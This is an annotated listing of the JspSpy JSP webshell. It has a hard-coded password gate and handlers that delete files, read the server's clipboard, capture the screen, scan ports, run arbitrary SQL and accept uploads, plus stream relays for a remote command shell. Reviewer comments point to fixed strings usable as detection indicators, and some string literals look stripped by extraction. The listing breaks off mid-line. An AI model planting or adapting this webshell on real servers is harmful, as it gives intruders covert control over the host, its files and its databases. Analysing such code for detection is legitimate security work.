      // session attribute named by PW_SESSION_ATTRIBUTE ("JspSpyPwd") against it. Both are
      // fixed strings, so they can serve as static indicators when scanning a web root for this file.
17 | private static final String PW = "joychou"; //password
18 | private static final String PW_SESSION_ATTRIBUTE = "JspSpyPwd";
      // Charsets used by MyRequest.getParameter to re-decode request parameters.
19 | private static final String REQUEST_CHARSET = "ISO-8859-1";
20 | private static final String PAGE_CHARSET = "UTF-8";
      // String keys; CURRENT_DIR is used as a session attribute name in the scriptlet below,
      // the others are used as session attribute names by handlers later in the file.
21 | private static final String CURRENT_DIR = "currentdir";
22 | private static final String MSG = "SHOWMSG";
23 | private static final String PORT_MAP = "PMSA";
24 | private static final String DBO = "DBO";
25 | private static final String SHELL_ONLINE = "SHELL_ONLINE";
      // Static, non-final: the scriptlet below reassigns these from the current request,
      // so the values are shared by every request served by this page.
26 | private static String SHELL_NAME = "";
27 | private static String WEB_ROOT = null;
28 | private static String SHELL_DIR = null;
      // Registry looked up by action name (see ins.get("login") / ins.get("vLogin") below);
      // nothing in this span puts entries into it.
      // NOTE(review): printed as a raw Map, yet the scriptlet calls .invoke(...) on the values;
      // presumably the type parameters were lost when the page was extracted - confirm against the file.
29 | public static Map ins = new HashMap();
      // Request wrapper that re-decodes every parameter value: the bytes of the container-decoded
      // string are taken as REQUEST_CHARSET and re-read as PAGE_CHARSET.
30 | private static class MyRequest extends HttpServletRequestWrapper {
31 |     public MyRequest(HttpServletRequest req) {
32 |         super(req);
33 |     }
          // Returns the re-decoded value, or null on any exception.
          // The null guard tests `name`, not `value`: for an absent parameter value.getBytes(...)
          // throws, and the catch below turns that into a null return.
34 |     public String getParameter(String name) {
35 |         try {
36 |             String value = super.getParameter(name);
37 |             if (name == null)
38 |                 return null;
39 |             return new String(value.getBytes(REQUEST_CHARSET),PAGE_CHARSET);
40 |         } catch (Exception e) {
41 |             return null;
42 |         }
43 |     }
44 | }
      // Thin JDBC holder: one Connection, one reusable Statement, plus the settings used to open it.
45 | private static class DBOperator{
46 |     private Connection conn = null;
47 |     private Statement stmt = null;
48 |     private String driver;
49 |     private String url;
50 |     private String uid;
51 |     private String pwd;
          // Convenience constructor: loads the driver class but does not connect.
52 |     public DBOperator(String driver,String url,String uid,String pwd) throws Exception {
53 |         this(driver,url,uid,pwd,false);
54 |     }
          // Loads the class named by `driver` via Class.forName, optionally opens the connection,
          // and stores all four settings for connect() and equals().
55 |     public DBOperator(String driver,String url,String uid,String pwd,boolean connect) throws Exception {
56 |         Class.forName(driver);
57 |         if (connect)
58 |             this.conn = DriverManager.getConnection(url,uid,pwd);
59 |         this.url = url;
60 |         this.driver = driver;
61 |         this.uid = uid;
62 |         this.pwd = pwd;
63 |     }
          // Opens (or replaces) the connection from the stored settings.
64 |     public void connect() throws Exception{
65 |         this.conn = DriverManager.getConnection(url,uid,pwd);
66 |     }
          // Runs the given SQL text as-is through Statement.execute.
          // Returns the ResultSet when the statement produced one, otherwise the update count;
          // throws when there is no open connection.
          // The stmt field is overwritten on each call; a previous Statement is not closed here.
67 |     public Object execute(String sql) throws Exception {
68 |         if (isValid()) {
69 |             stmt = conn.createStatement();
70 |             if (stmt.execute(sql)) {
71 |                 return stmt.getResultSet();
72 |             } else {
73 |                 return stmt.getUpdateCount();
74 |             }
75 |         }
76 |         throw new Exception("Connection is inValid.");
77 |     }
          // Closes the last Statement created by execute(), if any.
78 |     public void closeStmt() throws Exception{
79 |         if (this.stmt != null)
80 |             stmt.close();
81 |     }
          // True when a connection exists and is not closed.
82 |     public boolean isValid() throws Exception {
83 |         return conn != null && !conn.isClosed();
84 |     }
          // Closes statement and connection; does nothing when the connection is not valid.
85 |     public void close() throws Exception {
86 |         if (isValid()) {
87 |             closeStmt();
88 |             conn.close();
89 |         }
90 |     }
          // Two operators are equal when driver, url, uid and pwd all match.
          // No hashCode override is defined in this class.
91 |     public boolean equals(Object o) {
92 |         if (o instanceof DBOperator) {
93 |             DBOperator dbo = (DBOperator)o;
94 |             return this.driver.equals(dbo.driver) && this.url.equals(dbo.url) && this.uid.equals(dbo.uid) && this.pwd.equals(dbo.pwd);
95 |         }
96 |         return false;
97 |     }
98 | }
      // Thread that copies characters from one stream to another until the input ends.
99 | private static class StreamConnector extends Thread {
100 |     private InputStream is;
101 |     private OutputStream os;
102 |     public StreamConnector( InputStream is, OutputStream os ){
103 |         this.is = is;
104 |         this.os = os;
105 |     }
           // Reads up to 8192 chars at a time and flushes after every chunk.
           // Any exception ends the copy silently; both streams are then closed, again ignoring errors.
106 |     public void run(){
107 |         BufferedReader in = null;
108 |         BufferedWriter out = null;
109 |         try{
110 |             in = new BufferedReader( new InputStreamReader(this.is));
111 |             out = new BufferedWriter( new OutputStreamWriter(this.os));
112 |             char buffer[] = new char[8192];
113 |             int length;
114 |             while((length = in.read( buffer, 0, buffer.length ))>0){
115 |                 out.write( buffer, 0, length );
116 |                 out.flush();
117 |             }
118 |         } catch(Exception e){}
119 |         try{
120 |             if(in != null)
121 |                 in.close();
122 |             if(out != null)
123 |                 out.close();
124 |         } catch( Exception e ){}
125 |     }
126 | }
       // Holder for a child Process and a one-slot pending command string.
       // cmd starts as the sentinel "first", which OnLineConnector discards instead of sending.
127 | private static class OnLineProcess {
128 |     private String cmd = "first";
129 |     private Process pro;
130 |     public OnLineProcess(Process p){
131 |         this.pro = p;
132 |     }
133 |     public void setPro(Process p) {
134 |         this.pro = p;
135 |     }
136 |     public void setCmd(String c){
137 |         this.cmd = c;
138 |     }
139 |     public String getCmd(){
140 |         return this.cmd;
141 |     }
142 |     public Process getPro(){
143 |         return this.pro;
144 |     }
           // Destroys the held process.
145 |     public void stop(){
146 |         this.pro.destroy();
147 |     }
148 | }
       // Thread that relays data in one of two directions, chosen by `name`.
149 | private static class OnLineConnector extends Thread {
150 |     private OnLineProcess ol = null;
151 |     private InputStream is;
152 |     private OutputStream os;
153 |     private String name;
154 |     public OnLineConnector( InputStream is, OutputStream os ,String name,OnLineProcess ol){
155 |         this.is = is;
156 |         this.os = os;
157 |         this.name = name;
158 |         this.ol = ol;
159 |     }
           // name "exeRclientO": read 128-char chunks from `is`, run them through the replace chains
           // below and write them to `os`.
           // Any other name: poll ol.getCmd() every 500 ms, append char 10 to a pending command,
           // write it to `os` and reset the slot to null; that loop ends only through an exception.
           // NOTE(review): as printed, the replacement strings in lines 172-174 are identical to the
           // search strings or contain only a line break; presumably entity names and markup inside
           // the literals were decoded or stripped when the page was extracted - confirm against the file.
160 |     public void run(){
161 |         BufferedReader in = null;
162 |         BufferedWriter out = null;
163 |         try{
164 |             in = new BufferedReader( new InputStreamReader(this.is));
165 |             out = new BufferedWriter( new OutputStreamWriter(this.os));
166 |             char buffer[] = new char[128];
167 |             if(this.name.equals("exeRclientO")) {
168 |                 //from exe to client
169 |                 int length = 0;
170 |                 while((length = in.read( buffer, 0, buffer.length ))>0){
171 |                     String str = new String(buffer, 0, length);
172 |                     str = str.replace("&","&").replace("<","<").replace(">",">");
173 |                     str = str.replace(""+(char)13+(char)10,"
");
174 |                     str = str.replace("\n","
");
175 |                     out.write(str.toCharArray(), 0, str.length());
176 |                     out.flush();
177 |                 }
178 |             } else {
179 |                 //from client to exe
180 |                 while(true) {
181 |                     while(this.ol.getCmd() == null) {
182 |                         Thread.sleep(500);
183 |                     }
184 |                     if (this.ol.getCmd().equals("first")) {
185 |                         this.ol.setCmd(null);
186 |                         continue;
187 |                     }
188 |                     this.ol.setCmd(this.ol.getCmd() + (char)10);
189 |                     char[] arr = this.ol.getCmd().toCharArray();
190 |                     out.write(arr,0,arr.length);
191 |                     out.flush();
192 |                     this.ol.setCmd(null);
193 |                 }
194 |             }
195 |         } catch(Exception e){
196 |         }
197 |         try{
198 |             if(in != null)
199 |                 in.close();
200 |             if(out != null)
201 |                 out.close();
202 |         } catch( Exception e ){
203 |         }
204 |     }
205 | }
       // Minimal table model rendered to a string by toString().
206 | private static class Table{
207 |     private ArrayList rows = null;
208 |     private boolean echoTableTag = false;
209 |     public void setEchoTableTag(boolean v) {
210 |         this.echoTableTag = v;
211 |     }
212 |     public Table(){
213 |         this.rows = new ArrayList();
214 |     }
215 |     public void addRow(Row r) {
216 |         this.rows.add(r);
217 |     }
           // Appends one fragment per row and per column; each cell value goes through
           // Util.htmlEncode(Util.getStr(...)) and an empty result is replaced by a one-character string.
           // NOTE(review): the string literals are empty as printed and listing lines 226-230 appear
           // after line 235; presumably the markup inside the literals was rendered and stripped by
           // the page extraction. The listing numbers give the intended order - confirm against the file.
218 |     public String toString(){
219 |         StringBuilder html = new StringBuilder();
220 |         if (echoTableTag)
221 |             html.append("");
222 |         for (Row r:rows) {
223 |             html.append("");
224 |             for (Column c:r.getColumns()) {
225 |                 html.append("");
231 |             }
232 |             html.append("");
233 |         }
234 |         if (echoTableTag)
235 |             html.append("
");
226 |                 String vv = Util.htmlEncode(Util.getStr(c.getValue()));
227 |                 if (vv.equals(""))
228 |                     vv = " ";
229 |                 html.append(vv);
230 |                 html.append("
");
236 |         return html.toString();
237 |     }
238 | }
       // One table row: an ordered list of Column objects.
239 | private static class Row{
240 |     private ArrayList cols = null;
241 |     public Row(){
242 |         this.cols = new ArrayList();
243 |     }
244 |     public void addColumn(Column n) {
245 |         this.cols.add(n);
246 |     }
247 |     public ArrayList getColumns(){
248 |         return this.cols;
249 |     }
250 | }
       // One table cell holding a string value.
251 | private static class Column{
252 |     private String value;
253 |     public Column(String v){
254 |         this.value = v;
255 |     }
256 |     public String getValue(){
257 |         return this.value;
258 |     }
259 | }
       // Static helpers shared by the handlers.
260 | private static class Util{
           // True for null or whitespace-only strings.
261 |     public static boolean isEmpty(String s) {
262 |         return s == null || s.trim().equals("");
263 |     }
           // Same test applied to o.toString().
264 |     public static boolean isEmpty(Object o) {
265 |         return o == null || isEmpty(o.toString());
266 |     }
           // Formats a byte count starting at unit `danwei` ('B', 'K', 'M' or 'G'), moving up one
           // unit whenever the value exceeds 1024; any other unit char yields "0" followed by that char.
267 |     public static String getSize(long size,char danwei) {
268 |         if (danwei == 'M') {
269 |             double v = formatNumber(size / 1024.0 / 1024.0,2);
270 |             if (v > 1024) {
271 |                 return getSize(size,'G');
272 |             }else {
273 |                 return v + "M";
274 |             }
275 |         } else if (danwei == 'G') {
276 |             return formatNumber(size / 1024.0 / 1024.0 / 1024.0,2)+"G";
277 |         } else if (danwei == 'K') {
278 |             double v = formatNumber(size / 1024.0,2);
279 |             if (v > 1024) {
280 |                 return getSize(size,'M');
281 |             } else {
282 |                 return v + "K";
283 |             }
284 |         } else if (danwei == 'B') {
285 |             if (size > 1024) {
286 |                 return getSize(size,'K');
287 |             }else {
288 |                 return size + "B";
289 |             }
290 |         }
291 |         return ""+0+danwei;
292 |     }
           // Limits `value` to at most `l` fraction digits by formatting it without grouping and
           // parsing the text back; the formatter comes from NumberFormat.getInstance().
293 |     public static double formatNumber(double value,int l) {
294 |         NumberFormat format = NumberFormat.getInstance();
295 |         format.setMaximumFractionDigits(l);
296 |         format.setGroupingUsed(false);
297 |         return new Double(format.format(value));
298 |     }
           // True when v is non-empty and consists only of digits.
299 |     public static boolean isInteger(String v) {
300 |         if (isEmpty(v))
301 |             return false;
302 |         return v.matches("^\\d+$");
303 |     }
           // Formats a millisecond timestamp; the pattern uses "hh", the 12-hour field, with no AM/PM marker.
304 |     public static String formatDate(long time) {
305 |         SimpleDateFormat format = new SimpleDateFormat("yyyy-MM-dd hh:mm:ss");
306 |         return format.format(new java.util.Date(time));
307 |     }
           // Replaces backslashes with forward slashes; null becomes "".
308 |     public static String convertPath(String path) {
309 |         return path != null ? path.replace("\\","/") : "";
310 |     }
           // Replace chain over '&', '<' and '>'; quote characters are not handled.
           // NOTE(review): as printed each replacement equals its search string; presumably the
           // entity names were decoded by the page extraction - confirm against the file.
311 |     public static String htmlEncode(String v) {
312 |         if (isEmpty(v))
313 |             return "";
314 |         return v.replace("&","&").replace("<","<").replace(">",">");
315 |     }
           // Null-to-empty conversions.
316 |     public static String getStr(String s) {
317 |         return s == null ? "" :s;
318 |     }
319 |     public static String getStr(Object s) {
320 |         return s == null ? "" :s.toString();
321 |     }
           // Returns capture group `group` of the first match of `regex` in `str`, or null when nothing matches.
322 |     public static String exec(String regex, String str, int group) {
323 |         Pattern pat = Pattern.compile(regex);
324 |         Matcher m = pat.matcher(str);
325 |         if (m.find())
326 |             return m.group(group);
327 |         return null;
328 |     }
           // Writes a message with the default alignment "center".
329 |     public static void outMsg(Writer out,String msg) throws Exception {
330 |         outMsg(out,msg,"center");
331 |     }
           // Writes msg to `out`, prefixed with a hint when it mentions ClassNotFoundException.
           // msg is concatenated into the output without passing through htmlEncode.
           // NOTE(review): `align` is not referenced in the text as printed; presumably it was used
           // inside markup that the page extraction stripped from the literals - confirm against the file.
332 |     public static void outMsg(Writer out,String msg,String align) throws Exception {
333 |         if (msg.indexOf("java.lang.ClassNotFoundException") != -1)
334 |             msg = "Can Not Find The Driver!
" + msg;
335 |         out.write("
"+msg+"
");
336 |     }
337 | }
       // Hand-rolled multipart reader that writes an uploaded part to disk under savePath.
338 | private static class UploadBean {
339 |     private String fileName = null;
340 |     private String suffix = null;
341 |     private String savePath = "";
342 |     private ServletInputStream sis = null;
343 |     private byte[] b = new byte[1024];
344 |     public UploadBean() {
345 |     }
346 |     public void setSavePath(String path) {
347 |         this.savePath = path;
348 |     }
           // Scans the request body line by line (at most 1024 bytes per read) for filename="...".
           // The name comes from the request: an absolute path is reduced to its last component,
           // any other value is used unchanged. Each match triggers upload().
           // suffix is computed but not read anywhere in this class.
349 |     public void parseRequest(HttpServletRequest request) throws IOException {
350 |         sis = request.getInputStream();
351 |         int a = 0;
352 |         int k = 0;
353 |         String s = "";
354 |         while ((a = sis.readLine(b,0,b.length))!= -1) {
355 |             s = new String(b, 0, a,PAGE_CHARSET);
356 |             if ((k = s.indexOf("filename=\""))!= -1) {
357 |                 s = s.substring(k + 10);
358 |                 k = s.indexOf("\"");
359 |                 s = s.substring(0, k);
360 |                 File tF = new File(s);
361 |                 if (tF.isAbsolute()) {
362 |                     fileName = tF.getName();
363 |                 } else {
364 |                     fileName = s;
365 |                 }
366 |                 k = s.lastIndexOf(".");
367 |                 suffix = s.substring(k + 1);
368 |                 upload();
369 |             }
370 |         }
371 |     }
           // Skips input up to and including the "Content-Type:" line, skips one more line, then
           // writes every following read to savePath/fileName until a read starts with five '-' bytes (45).
           // The output stream is closed only on the success path; an IOException is printed and not rethrown.
372 |     private void upload() {
373 |         try {
374 |             FileOutputStream out = new FileOutputStream(new File(savePath,fileName));
375 |             int a = 0;
376 |             int k = 0;
377 |             String s = "";
378 |             while ((a = sis.readLine(b,0,b.length))!=-1) {
379 |                 s = new String(b, 0, a);
380 |                 if ((k = s.indexOf("Content-Type:"))!=-1) {
381 |                     break;
382 |                 }
383 |             }
384 |             sis.readLine(b,0,b.length);
385 |             while ((a = sis.readLine(b,0,b.length)) != -1) {
386 |                 s = new String(b, 0, a);
387 |                 if ((b[0] == 45) && (b[1] == 45) && (b[2] == 45) && (b[3] == 45) && (b[4] == 45)) {
388 |                     break;
389 |                 }
390 |                 out.write(b, 0, a);
391 |             }
392 |             out.close();
393 |         } catch (IOException ioe) {
394 |             ioe.printStackTrace();
395 |         }
396 |     }
397 | }
398 | %>
399 | <%
       // Per-request prologue.
       // 1. Derives SHELL_NAME (this page's own name), WEB_ROOT and SHELL_DIR from the servlet path
       //    and stores them in the static fields; when getRealPath returns nothing, the values are
       //    rebuilt from application.getResource("/").
       // 2. Seeds the session's CURRENT_DIR with the page's own directory on first use.
       // 3. Wraps the request in MyRequest so parameters are re-decoded.
       // 4. Access gate: unless the session attribute PW_SESSION_ATTRIBUTE equals PW, only the
       //    actions "login" and "vLogin" are dispatched; every other request is redirected to
       //    <page>?o=vLogin. The `o` query parameter selects the action, and that redirect is what
       //    a request without a valid session receives.
400 | SHELL_NAME = request.getServletPath().substring(request.getServletPath().lastIndexOf("/")+1);
401 | String myAbsolutePath = application.getRealPath(request.getServletPath());
402 | if (Util.isEmpty(myAbsolutePath)) {//for weblogic
403 |     SHELL_NAME = request.getServletPath();
404 |     myAbsolutePath = new File(application.getResource("/").getPath()+SHELL_NAME).toString();
405 |     SHELL_NAME=request.getContextPath()+SHELL_NAME;
406 |     WEB_ROOT = new File(application.getResource("/").getPath()).toString();
407 | } else {
408 |     WEB_ROOT = application.getRealPath("/");
409 | }
410 | SHELL_DIR = Util.convertPath(myAbsolutePath.substring(0,myAbsolutePath.lastIndexOf(File.separator)));
411 | if (session.getAttribute(CURRENT_DIR) == null)
412 |     session.setAttribute(CURRENT_DIR,Util.convertPath(SHELL_DIR));
413 | request = new MyRequest(request);
414 | if (session.getAttribute(PW_SESSION_ATTRIBUTE) == null || !(session.getAttribute(PW_SESSION_ATTRIBUTE)).equals(PW)) {
415 |     String o = request.getParameter("o");
416 |     if (o != null && o.equals("login")) {
417 |         ins.get("login").invoke(request,response,session);
418 |         return;
419 |     } else if (o != null && o.equals("vLogin")) {
420 |         ins.get("vLogin").invoke(request,response,session);
421 |         return;
422 |     } else {
423 |         response.sendRedirect(SHELL_NAME+"?o=vLogin");
424 |         return;
425 |     }
426 | }
427 | %>
428 | <%!
429 | private static interface Invoker { 430 | public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception; 431 | public boolean doBefore(); 432 | public boolean doAfter(); 433 | } 434 | private static class DefaultInvoker implements Invoker{ 435 | public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception { 436 | } 437 | public boolean doBefore(){ 438 | return true; 439 | } 440 | public boolean doAfter() { 441 | return true; 442 | } 443 | } 444 | private static class ScriptInvoker extends DefaultInvoker{ 445 | public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ 446 | try { 447 | PrintWriter out = response.getWriter(); 448 | out.println(""); 545 | 546 | } catch (Exception e) { 547 | e.printStackTrace(); 548 | throw e ; 549 | } 550 | } 551 | } 552 | private static class BeforeInvoker extends DefaultInvoker { 553 | public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ 554 | try { 555 | PrintWriter out = response.getWriter(); 556 | out.println("JspSpy"); 574 | } catch (Exception e) { 575 | e.printStackTrace(); 576 | throw e ; 577 | } 578 | } 579 | } 580 | private static class AfterInvoker extends DefaultInvoker { 581 | public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ 582 | try { 583 | PrintWriter out = response.getWriter(); 584 | out.println(""); 585 | } catch (Exception e) { 586 | e.printStackTrace(); 587 | throw e ; 588 | } 589 | } 590 | } 591 | private static class DeleteBatchInvoker extends DefaultInvoker { 592 | public boolean doBefore(){return false;} 593 | public boolean doAfter(){return false;} 594 | public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ 595 | try { 596 | String files = 
request.getParameter("files"); 597 | if (!Util.isEmpty(files)) { 598 | String currentDir = JSession.getAttribute(CURRENT_DIR).toString(); 599 | String[] arr = files.split(","); 600 | for (String fs:arr) { 601 | File f = new File(currentDir,fs); 602 | f.delete(); 603 | } 604 | } 605 | JSession.setAttribute(MSG,"Delete Files Success!"); 606 | response.sendRedirect(SHELL_NAME+"?o=index"); 607 | } catch (Exception e) { 608 | e.printStackTrace(); 609 | throw e ; 610 | } 611 | } 612 | } 613 | private static class ClipBoardInvoker extends DefaultInvoker { 614 | public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ 615 | try { 616 | PrintWriter out = response.getWriter(); 617 | out.println(""+ 618 | " "+ 619 | " "+ 631 | " "+ 632 | "
"+ 620 | "

System Clipboard »

"+ 621 | "

");
 622 | try{
 623 | out.println(Util.htmlEncode(Util.getStr(Toolkit.getDefaultToolkit().getSystemClipboard().getData(DataFlavor.stringFlavor))));
 624 | }catch (Exception ex) {
 625 | out.println("ClipBoard is Empty Or Is Not Text Data !");
 626 | }
 627 | out.println("
"+ 628 | " "+ 629 | "

"+ 630 | "
"); 633 | } catch (Exception e) { 634 | e.printStackTrace(); 635 | throw e ; 636 | } 637 | } 638 | } 639 | private static class VRemoteControlInvoker extends DefaultInvoker { 640 | public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ 641 | try { 642 | PrintWriter out = response.getWriter(); 643 | out.println(""); 666 | out.println(""+ 667 | " "+ 668 | " "+ 673 | " "+ 674 | "
"+ 669 | "

Remote Control »

"+ 670 | " Speed(Second , dont be so fast) Can Not Control Yet."+ 671 | "

"+ 672 | "
"); 675 | } catch (Exception e) { 676 | e.printStackTrace(); 677 | throw e ; 678 | } 679 | } 680 | } 681 | //GetScreen 682 | private static class GcInvoker extends DefaultInvoker { 683 | public boolean doBefore(){return false;} 684 | public boolean doAfter(){return false;} 685 | public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ 686 | try { 687 | Dimension size = Toolkit.getDefaultToolkit().getScreenSize(); 688 | Rectangle rec = new Rectangle(0,0,(int)size.getWidth(),(int)size.getHeight()); 689 | BufferedImage img = new Robot().createScreenCapture(rec); 690 | response.setContentType("image/jpeg"); 691 | ImageIO.write(img,"jpg",response.getOutputStream()); 692 | } catch (Exception e) { 693 | e.printStackTrace(); 694 | throw e ; 695 | } 696 | } 697 | } 698 | private static class VPortScanInvoker extends DefaultInvoker { 699 | public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ 700 | try { 701 | PrintWriter out = response.getWriter(); 702 | String ip = request.getParameter("ip"); 703 | String ports = request.getParameter("ports"); 704 | String timeout = request.getParameter("timeout"); 705 | if (Util.isEmpty(ip)) 706 | ip = "127.0.0.1"; 707 | if (Util.isEmpty(ports)) 708 | ports = "21,25,80,110,1433,1723,3306,3389,4899,5631,43958,65500"; 709 | if (Util.isEmpty(timeout)) 710 | timeout = "2"; 711 | out.println("
"+ 712 | "

PortScan >>

"+ 713 | "
"+ 714 | "

"+ 715 | "IP : Port : Timeout (秒) : "+ 716 | "

"+ 717 | "
"+ 718 | "
"); 719 | } catch (Exception e) { 720 | e.printStackTrace(); 721 | throw e ; 722 | } 723 | } 724 | } 725 | private static class PortScanInvoker extends DefaultInvoker { 726 | public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ 727 | try { 728 | PrintWriter out = response.getWriter(); 729 | ins.get("vPortScan").invoke(request,response,JSession); 730 | String ip = request.getParameter("ip"); 731 | String ports = request.getParameter("ports"); 732 | String timeout = request.getParameter("timeout"); 733 | int iTimeout = 0; 734 | if (Util.isEmpty(ip) || Util.isEmpty(ports)) 735 | return; 736 | if (!Util.isInteger(timeout)) { 737 | timeout = "2"; 738 | } 739 | iTimeout = Integer.parseInt(timeout); 740 | Map rs = new LinkedHashMap(); 741 | String[] portArr = ports.split(","); 742 | for (String port:portArr) { 743 | try { 744 | Socket s = new Socket(); 745 | s.connect(new InetSocketAddress(ip,Integer.parseInt(port)),iTimeout); 746 | s.close(); 747 | rs.put(port,"Open"); 748 | } catch (Exception e) { 749 | rs.put(port,"Close"); 750 | } 751 | } 752 | out.println("
"); 753 | Set> entrySet = rs.entrySet(); 754 | for (Map.Entry e:entrySet) { 755 | String port = e.getKey(); 756 | String value = e.getValue(); 757 | out.println(ip+" : "+port+" ................................. "+value+"
"); 758 | } 759 | out.println("
"); 760 | } catch (Exception e) { 761 | e.printStackTrace(); 762 | throw e ; 763 | } 764 | } 765 | } 766 | private static class VConnInvoker extends DefaultInvoker { 767 | public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ 768 | try { 769 | PrintWriter out = response.getWriter(); 770 | Object obj = JSession.getAttribute(DBO); 771 | if (obj == null || !((DBOperator)obj).isValid()) { 772 | out.println(" "); 781 | out.println("
"+ 782 | "
"+ 783 | ""+ 784 | "

DataBase Manager »

"+ 785 | ""+ 786 | "

"+ 787 | "Driver:"+ 788 | " "+ 789 | "URL:"+ 790 | ""+ 791 | "UID:"+ 792 | ""+ 793 | "PWD:"+ 794 | ""+ 795 | "DataBase:"+ 796 | " "+ 803 | ""+ 804 | "

"+ 805 | "
"); 806 | } else { 807 | ins.get("dbc").invoke(request,response,JSession); 808 | } 809 | } catch (Exception e) { 810 | e.printStackTrace(); 811 | throw e ; 812 | } 813 | } 814 | } 815 | //DBConnect 816 | private static class DbcInvoker extends DefaultInvoker { 817 | public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ 818 | try { 819 | PrintWriter out = response.getWriter(); 820 | String driver = request.getParameter("driver"); 821 | String url = request.getParameter("url"); 822 | String uid = request.getParameter("uid"); 823 | String pwd = request.getParameter("pwd"); 824 | String sql = request.getParameter("sql"); 825 | String selectDb = request.getParameter("selectDb"); 826 | if (selectDb == null) 827 | selectDb = JSession.getAttribute("selectDb").toString(); 828 | else 829 | JSession.setAttribute("selectDb",selectDb); 830 | Object dbo = JSession.getAttribute(DBO); 831 | if (dbo == null || !((DBOperator)dbo).isValid()) { 832 | if (dbo != null) 833 | ((DBOperator)dbo).close(); 834 | dbo = new DBOperator(driver,url,uid,pwd,true); 835 | } else { 836 | if (!Util.isEmpty(driver) && !Util.isEmpty(url) && !Util.isEmpty(uid)) { 837 | DBOperator oldDbo = (DBOperator)dbo; 838 | dbo = new DBOperator(driver,url,uid,pwd); 839 | if (!oldDbo.equals(dbo)) { 840 | ((DBOperator)oldDbo).close(); 841 | ((DBOperator)dbo).connect(); 842 | } else { 843 | dbo = oldDbo; 844 | } 845 | } 846 | } 847 | DBOperator Ddbo = (DBOperator)dbo; 848 | JSession.setAttribute(DBO,Ddbo); 849 | Util.outMsg(out,"Connect To DataBase Success!"); 850 | out.println(" "); 862 | out.println("
"+ 863 | "
"+ 864 | ""+ 865 | "

DataBase Manager »

"+ 866 | ""+ 867 | "

"+ 868 | "Driver:"+ 869 | " "+ 870 | "URL:"+ 871 | ""+ 872 | "UID:"+ 873 | ""+ 874 | "PWD:"+ 875 | ""+ 876 | "DataBase:"+ 877 | " "+ 884 | ""+ 885 | "

"+ 886 | "
"); 887 | out.println("
"+ 888 | "

Run SQL query/queries on database :

"); 889 | } catch (Exception e) { 890 | //e.printStackTrace(); 891 | throw e; 892 | } 893 | } 894 | } 895 | private static class ExecuteSQLInvoker extends DefaultInvoker{ 896 | public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ 897 | try { 898 | PrintWriter out = response.getWriter(); 899 | String sql = request.getParameter("sql"); 900 | String db = request.getParameter("selectDb"); 901 | Object dbo = JSession.getAttribute(DBO); 902 | if (!Util.isEmpty(sql)) { 903 | if (dbo == null || !((DBOperator)dbo).isValid()) { 904 | response.sendRedirect(SHELL_NAME+"?o=vConn"); 905 | } else { 906 | ins.get("dbc").invoke(request,response,JSession); 907 | Object obj = ((DBOperator)dbo).execute(sql); 908 | if (obj instanceof ResultSet) { 909 | ResultSet rs = (ResultSet)obj; 910 | ResultSetMetaData meta = rs.getMetaData(); 911 | int colCount = meta.getColumnCount(); 912 | out.println("

Query#0 : "+Util.htmlEncode(sql)+"

"); 913 | out.println(""); 914 | for (int i=1;i<=colCount;i++) { 915 | out.println(""); 916 | } 917 | out.println(""); 918 | Table tb = new Table(); 919 | while(rs.next()) { 920 | Row r = new Row(); 921 | for (int i = 1;i<=colCount;i++) { 922 | r.addColumn(new Column(rs.getString(i))); 923 | } 924 | tb.addRow(r); 925 | } 926 | out.println(tb.toString()); 927 | out.println("
"+meta.getColumnName(i)+"
"+meta.getColumnTypeName(i)+"
"); 928 | rs.close(); 929 | ((DBOperator)dbo).closeStmt(); 930 | } else { 931 | out.println("

affected rows : "+obj+"

"); 932 | } 933 | } 934 | } else { 935 | ins.get("dbc").invoke(request,response,JSession); 936 | } 937 | } catch (Exception e) { 938 | e.printStackTrace(); 939 | throw e ; 940 | } 941 | } 942 | } 943 | private static class VLoginInvoker extends DefaultInvoker { 944 | public boolean doBefore() {return false;} 945 | public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ 946 | try { 947 | PrintWriter out = response.getWriter(); 948 | out.println("
"+ 952 | "

Password: "+ 953 | " "+ 954 | " "+ 955 | " "+ 956 | "

"+ 957 | " "+ 958 | "Copyright © 2017 Helen www.baidu.com

"+ 959 | "
"); 960 | } catch (Exception e) { 961 | e.printStackTrace(); 962 | throw e ; 963 | } 964 | } 965 | } 966 | private static class LoginInvoker extends DefaultInvoker{ 967 | public boolean doBefore() {return false;} 968 | public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ 969 | try { 970 | String inputPw = request.getParameter("pw"); 971 | if (Util.isEmpty(inputPw) || !inputPw.equals(PW)) { 972 | response.sendRedirect(SHELL_NAME+"?o=vLogin"); 973 | return; 974 | } else { 975 | JSession.setAttribute(PW_SESSION_ATTRIBUTE,inputPw); 976 | response.sendRedirect(SHELL_NAME+"?o=index"); 977 | return; 978 | } 979 | } catch (Exception e) { 980 | e.printStackTrace(); 981 | throw e ; 982 | } 983 | } 984 | } 985 | private static class MyComparator implements Comparator{ 986 | public int compare(File f1,File f2) { 987 | if (f1 != null && f2!= null) { 988 | if (f1.isDirectory()) { 989 | if (f2.isDirectory()) { 990 | return f1.getName().compareTo(f2.getName()); 991 | } else { 992 | return -1; 993 | } 994 | } else { 995 | if (f2.isDirectory()) { 996 | return 1; 997 | } else { 998 | return f1.getName().compareTo(f2.getName()); 999 | } 1000 | } 1001 | } 1002 | return 0; 1003 | } 1004 | } 1005 | private static class FileListInvoker extends DefaultInvoker { 1006 | public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception { 1007 | try { 1008 | PrintWriter out = response.getWriter(); 1009 | String path 